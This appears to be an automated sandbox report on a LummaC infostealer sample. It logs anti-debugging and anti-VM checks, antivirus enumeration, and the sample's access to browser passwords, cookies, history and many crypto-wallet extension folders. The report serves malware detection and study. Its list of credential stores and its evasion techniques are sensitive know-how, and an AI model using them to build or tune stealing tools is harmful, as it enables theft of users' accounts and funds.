          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A9F second address: 4D10ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F37B4535CE6h 0x00000010 je 00007F3824C035BFh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10ADA second address: 4D10ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10ADE second address: 4D10AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10AFB second address: 4D10B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F37B45370A8h 0x0000000b add ax, EBC8h 0x00000010 jmp 00007F37B453709Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [7544459Ch], 05h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F37B45370A4h 0x00000027 jmp 00007F37B45370A5h 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F3824C1C9CCh 0x00000034 pushad 0x00000035 mov ch, dh 0x00000037 mov bh, cl 0x00000039 popad 0x0000003a push ebp 0x0000003b pushad 0x0000003c call 00007F37B453709Ah 0x00000041 jmp 00007F37B45370A2h 0x00000046 pop ecx 0x00000047 mov esi, edx 0x00000049 popad 0x0000004a mov dword ptr [esp], esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 mov eax, 590FC5FBh 0x00000057 popad 0x00000058 rdtsc
          Tries to evade debugger and weak emulator (self modifying code)
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3FCB0F instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 626419 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7852Thread sleep time: -210000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7852Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, file.exe, 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
          Source: file.exe, 00000000.00000003.1521304357.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1522746550.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525055106.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524670338.00000000056D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: multipart/form-data; boundary=A8CHGFSQ06VHXG923TMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Keep-Alive
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
          Source: file.exe, 00000000.00000002.1602655677.0000000000FD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: file.exe, 00000000.00000002.1602655677.0000000001027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.1522907213.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524670338.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1551144110.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545484064.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521304357.00000000056C2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1550281901.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525055106.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521426602.00000000056C9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521591921.00000000056C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: --A8CHGFSQ06VHXG923T
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
          Source: file.exe, 00000000.00000003.1523408821.000000000109D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525293509.000000000109D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521705021.000000000109C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Content-Type: multipart/form-data; boundary=A8CHGFSQ06VHXG923T
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
          Source: file.exe, 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
          Source: file.exe, 00000000.00000003.1521304357.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1522746550.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1525055106.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524670338.00000000056D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: multipart/form-data; boundary=A8CHGFSQ06VHXG923T
          Source: file.exe, 00000000.00000003.1471508248.00000000056DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (window names)
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DDF70 LdrInitializeThunk,0_2_003DDF70
          Source: file.exe, file.exe, 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: xZProgram Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, 00000000.00000003.1551144110.00000000056B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602655677.0000000001027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: file.exe, file.exe, 00000000.00000003.1600238733.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546353038.0000000001085000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7660, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC
          Source: file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash
          Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: file.exeString found in binary or memory: Wallets/Exodus
          Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exeString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
